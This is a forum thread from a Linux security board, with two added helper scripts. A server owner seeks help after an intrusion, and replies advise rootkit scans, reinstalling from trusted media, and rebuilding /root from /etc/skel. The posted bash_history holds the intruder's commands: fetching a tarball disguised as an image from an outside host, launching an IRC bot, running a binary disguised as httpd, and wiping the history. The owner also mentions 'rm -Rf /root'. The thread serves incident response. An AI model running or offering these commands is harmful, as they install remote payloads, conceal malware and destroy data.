LinuxQuestions.org (/questions/)
Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
Root user bash shell look like "bash-2.05b#" and /root empty (https://www.linuxquestions.org/questions/linux-security-4/root-user-bash-shell-look-like-bash-2-05b-and-root-empty-538959/)

y2pk001 03-20-2007 04:33 AM

Root user bash shell look like "bash-2.05b#" and /root empty
 
Hi there

Please help me... anyone

My server was attacked by a scriptkiddie and the little bastard loaded a script which ran from the /tmp dir. I managed to delete everything and the server seems to be fine, but... after my last restart I connected using ssh/root and my prompt appeared like "bash-2.05b#". I then did a directory listing in the root dir and found it to be empty????

What's going on?

Has this box been seriously compromised and am I too stupid to realise?

Any help or suggestions, thanks

PS If this post is in the wrong place, oops sorry

Capt_Caveman 03-20-2007 06:20 AM

Quote:

Originally Posted by y2pk001
after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????

But if you login locally (physically login to the system) is the root filesystem there?

In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?

y2pk001 03-20-2007 09:57 AM

Thanks for your response :)

I am unable to log onto the machine locally; it lives on the other side of the world from me. I will ask the ISP guys to have a look.

I have run all the tools you spoke of and everything checks out fine.
Here is the bash_history:

keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history


All I did was delete the user, and I found a funny process running in the /tmp dir; I deleted everything in /tmp and killed the process.

What that process was doing was sending email (spam) that looked like it was coming from ebay.com; that stopped.

What else should I do??

Thanks a million

Capt_Caveman 03-20-2007 08:04 PM

Quote:

All I did was delete the user

So a new user was created on the system?

Quote:

and I found a funny process running in the /tmp dir

From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?

Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However, that isn't really an option here it seems. The odd bash prompt and missing filesystem are concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.
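A read-only triage pass along the lines of this reply (look in /var/tmp as well as /tmp, and assume the history is incomplete), written as an added example and not part of the original thread. It assumes a Linux host with /proc; the function names, the directory arguments and the `--run` switch are my own choices, while the `/var/tmp/httpd` copy and the `all.jpg` tarball it looks for come from the bash_history posted above. Nothing here kills or deletes anything, so it can be run before deciding whether to rebuild.

```shell
#!/bin/sh
# Added example, not from the thread: read-only triage of the scratch
# directories an intruder typically works from. Directory arguments are
# parameters so each function can be exercised against a test directory.

# 1. Processes whose binary, working directory or command line lives under
#    a scratch directory (the "funny process in /tmp" above). Linux /proc only.
procs_running_from() {
    [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm
    for p in /proc/[0-9]*; do
        pid="${p#/proc/}"
        exe=$(readlink "$p/exe" 2>/dev/null) || exe=""
        cwd=$(readlink "$p/cwd" 2>/dev/null) || cwd=""
        # cmdline is NUL-separated; processes we may not read yield ""
        cmd=$(tr '\0' ' ' 2>/dev/null < "$p/cmdline" || true)
        for d in "$@"; do
            d="${d%/}"
            # trailing slash on cwd so an exact directory match counts
            case "$exe $cwd/ $cmd" in
                *"$d"/*)
                    printf '%s exe=%s cwd=%s cmd=%s\n' "$pid" "${exe:-?}" "${cwd:-?}" "$cmd"
                    break ;;
            esac
        done
    done
}

# 2. Regular files with the owner execute bit set in scratch directories
#    (a copy like /var/tmp/httpd would show up here).
executables_in() {
    [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm
    for d in "$@"; do
        find "$d" -xdev -type f -perm -100 2>/dev/null
    done
}

# 3. Files whose name says "image" or "text" but whose first bytes are a
#    gzip or ELF signature, like the all.jpg tarball in the history above.
disguised_files_in() {
    [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm
    for d in "$@"; do
        find "$d" -xdev -type f 2>/dev/null | while IFS= read -r f; do
            magic=$(head -c 4 "$f" 2>/dev/null | od -An -tx1 | tr -d ' \n')
            case "$magic" in
                1f8b*)    kind=gzip ;;
                7f454c46) kind=ELF ;;
                *)        continue ;;
            esac
            case "$f" in
                *.jpg|*.jpeg|*.gif|*.png|*.txt|*.log)
                    printf '%s: %s data behind a .%s name\n' "$f" "$kind" "${f##*.}" ;;
            esac
        done
    done
}

# Usage: sh triage.sh --run   (scans /tmp, /var/tmp and /dev/shm)
if [ "${1:-}" = "--run" ]; then
    echo "== processes running from scratch directories"; procs_running_from
    echo "== executable files in scratch directories";    executables_in
    echo "== files whose content contradicts their name"; disguised_files_in
fi
```

The process check deliberately looks at the command line as well as the executable link, because a dropped shell script executes as /bin/sh and would otherwise be missed. None of this sees through a kernel-level rootkit, which is the caveat the reply below makes about trusting ls at all.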

y2pk001 03-22-2007 03:13 AM

The user existed but was created with /bin/bash and a VERY weak password (not by me, by my incompetent colleague); it was for a client who wanted POP3/IMAP email.

I have a feeling that in my panic I might have typed:

rm -Rf /root

What would have happened if I was stupid enough to do that?

A re-install will be a bit difficult; with the current political environment within my office it will almost certainly mean a move to Microsoft Windows, which will almost certainly result in my resignation. So I sort of need to try and fix this mess on the hush hush.

Again, thanks a lot for your help

Fadoksi 03-22-2007 04:20 AM

If you can be 101+% sure root isn't compromised and there are no backdoors or other kiddie stuff on the server, I think you can restore your server's normal operation after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.

Capt_Caveman 03-22-2007 08:33 PM

Quote:

Originally Posted by y2pk001
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happened if I was stupid enough to do that?

It would just delete root's home filesystem, in which case you would likely have effects like the ones you're experiencing, like the odd bash prompt, because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed: they could have basically done anything, including installing malicious kernel modules or even replacing the kernel itself with a version that happily reports everything is OK and does other nasty things like neglecting to show any files owned by the intruder when using system commands like ls. So it is very important to be sure of this.

Quote:

Originally Posted by y2pk001
A re-install will be a bit difficult; with the current political environment within my office it will almost certainly mean a move to Microsoft Windows, which will almost certainly result in my resignation. So I sort of need to try and fix this mess on the hush hush.

Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.

If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.
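The rebuild-from-/etc/skel step the reply describes, written out as an added example (not the poster's own script). The function takes the skeleton and target directories as parameters, defaulting to /etc/skel and /root, so it can be tried against scratch directories before touching the real home; the `--apply` switch is my own convention. It assumes, as the reply does, that the rest of the system is trusted and only /root was wiped.

```shell
#!/bin/sh
# Added example (not from the thread): rebuild a wiped root home directory
# from the distro's skeleton files, then fix ownership and permissions.

restore_root_home() {
    skel="${1:-/etc/skel}"
    target="${2:-/root}"

    [ -d "$skel" ] || { echo "skeleton dir $skel is missing" >&2; return 1; }

    # Recreate the directory itself if rm -rf took it too.
    mkdir -p "$target" || return 1

    # Copy dotfiles and anything else the distro ships in the skeleton.
    # The -e guard skips the literal pattern when a glob matches nothing.
    for f in "$skel"/.[!.]* "$skel"/*; do
        [ -e "$f" ] || continue
        cp -pR "$f" "$target"/ || return 1
    done

    # Ownership can only be set when running as root; mode 700 keeps
    # everyone else out of root's home.
    if [ "$(id -u)" -eq 0 ]; then
        chown -R 0:0 "$target" || return 1
    fi
    chmod 700 "$target" || return 1
}

# Print mode, owner and contents so the result can be checked by eye.
show_root_home() {
    target="${1:-/root}"
    ls -ld "$target"
    ls -la "$target"
}

# Usage (as root): sh restore_root.sh --apply
if [ "${1:-}" = "--apply" ]; then
    restore_root_home && show_root_home
fi
```

After running it, log in again over ssh: the prompt should come back from the restored .bashrc, and `ls -ld /root` should show `drwx------ root root`. If files reappear in /root that you did not put there, or the restored dotfiles differ from /etc/skel, that points back to the intruder rather than to a stray rm.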

